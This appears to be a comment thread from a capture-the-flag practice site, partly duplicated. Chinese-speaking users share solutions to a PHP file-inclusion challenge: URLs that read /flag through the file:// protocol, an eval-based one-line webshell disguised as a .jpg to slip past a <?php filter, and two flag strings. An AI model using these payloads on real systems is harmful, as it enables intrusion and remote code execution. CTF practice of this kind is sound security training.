http://114.67.175.224:18550/index.php?file=//flag
1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX
虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php
绕来绕去看到你的评论一把过
http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}
这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了
传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单
<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可
文件上传+文件包含
flag{9be4acf19dc430e5ba2973dbb72f371d}
真的无语了 连上马找不到flag 删flag的人马亖了
使用file协议读取文件内容,index.php?file=file:///flag得到flag
@Striker123456 因为原本的协议是file://但是flag这个文件前面需要一个/
为什么是三个斜杠呢
...
评论
CHLing 3月前
举报
http://114.67.175.224:18550/index.php?file=//flag
qiusheng 6月前
举报
1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX
xiaoxiao972521 7月前
举报
虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php
冯飞99 7月前
举报
绕来绕去看到你的评论一把过
zzccbb2005 11月前
举报
http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}
109张某 1年前
举报
这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了
asd+1024 7月前
举报
传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单
不会编程的崽 1年前
举报
<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可
2728462336 1年前
举报
文件上传+文件包含
wxy1343 1年前
举报
flag{9be4acf19dc430e5ba2973dbb72f371d}
⎝ZJJARY 1年前
举报
真的无语了 连上马找不到flag 删flag的人马亖了
dtm 1年前
举报
使用file协议读取文件内容,index.php?file=file:///flag得到flag
baianquanzu 1年前
举报
@Striker123456 因为原本的协议是file://但是flag这个文件前面需要一个/
Striker123456 1年前
举报
为什么是三个斜杠呢